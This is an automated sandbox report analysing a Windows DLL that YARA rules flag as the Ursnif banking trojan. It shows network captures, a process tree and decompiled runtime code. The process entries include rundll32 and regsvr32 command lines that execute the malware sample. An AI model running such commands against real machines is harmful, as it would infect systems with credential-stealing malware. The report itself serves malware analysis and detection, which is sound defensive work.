2021-11-22 13:29:18 UTC	4	IN	Data Raw: 70 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61 69 6e 3a 61 2c 61 70 69 44 6f 6d 61 69 6e 3a 64 2c 76 65 72 73 69 6f 6e 3a 62 2c 77 65 62 Data Ascii: p.websiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t\|\|((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,domain:a,apiDomain:d,version:b,web
2021-11-22 13:29:18 UTC	5	IN	Data Raw: 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 28 61 2b 74 29 29 29 7d 2c 61 2b 3d 74 7d 29 7d 76 Data Ascii: in:Math.trunc(100(+o+0)),max:Math.trunc(100(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100(s+ua)),max:Math.trunc(100(s+u(a+t)))},a+=t})}v
2021-11-22 13:29:18 UTC	7	IN	Data Raw: 7d 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 Data Ascii: }var a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;return i(this,function(e){switch(
2021-11-22 13:29:18 UTC	8	IN	Data Raw: 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 Data Ascii: bileContentEnabled="true"==localStorage.getItem("forceMobileContent")\|\|p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android\|bb\d+\|meego).+mobile\|avantgo\|bada\/\|blackberry\|blazer\|compal\|elaine\|fennec\|hiptop\|iemobile\|ip(hone\|od)\|iris\|kindle
2021-11-22 13:29:18 UTC	9	IN	Data Raw: 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 Data Ascii: \|o\|v)\|zz)\|mt(50\|p1\|v )\|mwbp\|mywa\|n10[0-2]\|n20[2-3]\|n30(0\|2)\|n50(0\|2\|5)\|n7(0(0\|1)\|10)\|ne((c\|m)\-\|on\|tf\|wf\|wg\|wt)\|nok(6\|i)\|nzph\|o2im\|op(ti\|wv)\|oran\|owg1\|p800\|pan(a\|d\|t)\|pdxg\|pg(13\|\-([1-8]\|c))\|phil\|pire\|pl(ay\|uc)\|pn\-2\|po(ck\|rt\|se)\|prox\|psio\|pt\-g\|qa\-a\|qc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49760	142.250.203.102	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:29:28 UTC	11	OUT	GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Connection: Keep-Alive
2021-11-22 13:29:29 UTC	11	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: image/x-icon Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media" Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]} Content-Length: 1078 Date: Mon, 22 Nov 2021 13:16:17 GMT Expires: Tue, 23 Nov 2021 13:16:17 GMT Last-Modified: Tue, 08 May 2012 13:08:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Age: 792 Cache-Control: public, max-age=86400 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-11-22 13:29:29 UTC	12	IN	Data Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii: (& N(
2021-11-22 13:29:29 UTC	12	IN	Data Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49761	104.26.3.70	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:29:29 UTC	13	OUT	GET /px.gif?ch=1&e=0.4482105559414631 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad-delivery.net Connection: Keep-Alive
2021-11-22 13:29:29 UTC	13	IN	HTTP/1.1 200 OK Date: Mon, 22 Nov 2021 13:29:29 GMT Content-Type: image/gif Content-Length: 43 Connection: close X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw Expires: Mon, 22 Nov 2021 12:53:48 GMT Last-Modified: Wed, 05 May 2021 19:25:32 GMT ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3" x-goog-generation: 1620242732037093 x-goog-metageneration: 5 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 43 x-goog-hash: crc32c=cpEfJQ== x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow== x-goog-storage-class: MULTI_REGIONAL Access-Control-Allow-Origin: * Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace Age: 3285 Cache-Control: public, max-age=86400 CF-Cache-Status: HIT Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lruqchTT%2BBTz%2Fj9VAaTqInGgyzWdQOqLpICht5738DIpEUGYfjer1A3IhyGk8osDGsaVOdeAk9xXoFSH3BcuimtT1oD%2B1P%2Bxm7fvPRpw7o6XCBQ1YE2y6ooflN3J6aBJOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b2281c6cd8d4e80-FRA
2021-11-22 13:29:29 UTC	14	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 Data Ascii: GIF89a!
2021-11-22 13:29:29 UTC	14	IN	Data Raw: 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: ,L;

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5092 Parent PID: 6020

General

Start time:	14:28:43
Start date:	22/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll"
Imagebase:	0xdd0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2244 Parent PID: 5092

General

Start time:	14:28:43
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2076 Parent PID: 5092

General

Start time:	14:28:44
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\2zTgaLRFkL.dll
Imagebase:	0xa60000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4888 Parent PID: 2244

General

Start time:	14:28:44
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 764 Parent PID: 5092

General

Start time:	14:28:44
Start date:	22/11/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff7949f0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5132 Parent PID: 5092

General

Start time:	14:28:45
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,DllRegisterServer
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5164 Parent PID: 764

General

Start time:	14:28:46
Start date:	22/11/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:764 CREDAT:17410 /prefetch:2
Imagebase:	0x2a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4380 Parent PID: 5092

General

Start time:	14:28:50
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abetfoehywujav
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6004 Parent PID: 5092

General

Start time:	14:28:54
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abjqkqaxstop
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5092 Parent PID: 6020 loaddll32.exeCOMMON

Executed Functions

Function 73211770, Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

DllRegisterServer, xrefs: 7321196D

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: DllRegisterServer
API String ID: 1029625771-1663957109
Opcode ID: ae8d092b1ac5383b0d30542e5a799b0c6998e011d30009c555f7d2650f844db3
Instruction ID: df14adb875deef3d3f613962ba3abc82aad06a0cb4680cbab0c22272badff0d6
Opcode Fuzzy Hash: ae8d092b1ac5383b0d30542e5a799b0c6998e011d30009c555f7d2650f844db3
Instruction Fuzzy Hash: 13510631A087558FE306CF3CC55072ABBE5BF86340F158A6EE89697351E37494D2CB82

Uniqueness

Uniqueness Score: -1.00%

Function 7321297B, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E7321297B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x7322fa90);
				E732131E0(__ebx, __edi, __esi);
				_t34 =  *0x73231870; // 0x1
				if(_t34 > 0) {
					 *0x73231870 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E73212DC3();
					 *(_t82 - 4) = 1;
					__eflags =  *0x73231bb0 - 2;
					if( *0x73231bb0 != 2) {
						E7321305D(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x7322fab8);
						E732131E0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E73212B36( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E73212821(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E732119D0( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E732119D0( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E7321297B(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E73212B36( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E73212821(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E73212B36( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x73231870 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E73212E8E(__ebx, _t61, 1, __esi);
						E73212D4A();
						E732131AC();
						 *0x73231bb0 =  *0x73231bb0 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E73212A10();
						_t54 = E7321302F( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E73212A1D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x7321297b
0x7321297b
0x7321297d
0x73212982
0x73212987
0x7321298e
0x73212995
0x7321299d
0x732129a0
0x732129a9
0x732129ac
0x732129af
0x732129b6
0x73212a25
0x73212a2a
0x73212a2b
0x73212a2d
0x73212a32
0x73212a37
0x73212a3a
0x73212a3c
0x73212a4d
0x73212a4d
0x73212a51
0x73212a54
0x73212a60
0x73212a60
0x73212a6d
0x73212a6f
0x73212a72
0x73212a74
0x73212a7f
0x73212a84
0x73212a86
0x73212a89
0x73212a8b
0x00000000
0x00000000
0x73212a8b
0x73212a56
0x73212a56
0x73212a59
0x00000000
0x73212a5b
0x73212a5b
0x73212a91
0x73212a91
0x73212a9b
0x73212a9d
0x73212aa0
0x73212aa3
0x73212aa5
0x73212aa7
0x73212aa9
0x73212aae
0x73212ab3
0x73212ab5
0x73212ab5
0x73212abb
0x73212abc
0x73212ac1
0x73212ac7
0x73212ac7
0x73212aa7
0x73212acc
0x73212ace
0x73212ad5
0x73212adf
0x73212ae1
0x73212ae4
0x73212ae6
0x73212af2
0x73212b1a
0x73212b1a
0x73212ad0
0x73212ad0
0x73212ad3
0x00000000
0x00000000
0x73212ad3
0x73212ace
0x73212a59
0x73212b1d
0x73212b24
0x73212a3e
0x73212a3e
0x73212a44
0x00000000
0x73212a46
0x73212a46
0x73212a46
0x73212a44
0x73212b29
0x73212b35
0x732129b8
0x732129b8
0x732129bd
0x732129c2
0x732129c7
0x732129ce
0x732129d2
0x732129dc
0x732129e8
0x732129ea
0x732129ea
0x732129ec
0x732129ef
0x732129f6
0x732129fb
0x00000000
0x732129fb
0x73212990
0x73212990
0x732129fd
0x73212a00
0x73212a0c
0x73212a0c

APIs

__RTC_Initialize.LIBCMT ref: 732129C2
___scrt_uninitialize_crt.LIBCMT ref: 732129DC

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: e1b0e00e12b48c50fc63ce546d9d7630127dc16c390f9f7a7fa1ef04ee5deea1
Instruction ID: 4a36726837380e86d5c9f34e2559c6a5282c6256c87ff49a83a0ce20fbe39242
Opcode Fuzzy Hash: e1b0e00e12b48c50fc63ce546d9d7630127dc16c390f9f7a7fa1ef04ee5deea1
Instruction Fuzzy Hash: AC41C532E0431FEFEB219F65DA00B5F3AF9EF40B90F154119F81567180D7715AA18BA0

Uniqueness

Uniqueness Score: -1.00%

Function 73212A2B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E73212A2B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x7322fab8);
				E732131E0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E73212B36( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E73212821(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E732119D0( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
